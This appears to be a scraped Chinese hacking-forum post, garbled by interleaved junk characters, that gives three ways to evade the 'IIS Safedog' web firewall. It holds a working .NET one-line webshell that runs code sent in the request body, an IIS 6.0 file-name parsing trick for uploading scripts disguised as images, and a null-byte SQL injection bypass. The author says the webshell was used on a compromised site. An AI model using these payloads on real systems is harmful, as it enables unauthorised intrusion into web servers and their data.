1、绕过IIS安全狗的一句话。
1 v4 I# K: \+ g$ |: ^; l3 {& E前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
3 Q7 v1 \0 W; [. ~<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
* U& a3 w7 N, L$ H2 k5 I; z: ?+ J% v4 {- r* y+ G
2、IIS6.0解析漏洞遇到安全狗。
( M0 T; `3 P4 W% `7 [" h文件名为
1 h7 H: J2 T h1 a4 c: {$ I- Hhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg! q3 v- d# R3 p( T
0 y- u0 J0 d; I4 @2 j p- O" V2 Y这样的会被IIS安全狗果断屏蔽。
% |- _( X6 X6 X& e" D8 O" p+ f6 ~改成如下名称,IIS6一样会解析:4 j; Q* Z1 V) w9 e
www.xxxxx.com/;1.asp;1.jpg! x, c3 a3 F8 ~; l& `! [6 F8 t
" ?! s6 N/ E8 N8 N' V6 A& {3、安全狗的注入绕过。8 ^% L6 z! H& {, F
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。: m* {: p( d: T( s7 ^# G
但如果:
1 D* [$ q |$ v; y* e& ]$ n1 Xr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1% p1 T; a0 M" P
就可以成功绕过了。; F0 d! ~* s# \8 ?4 F
& H r, ?/ Y- R/ `5 C; z+ A
; P4 u% j# N5 t( q0 [8 l. I
|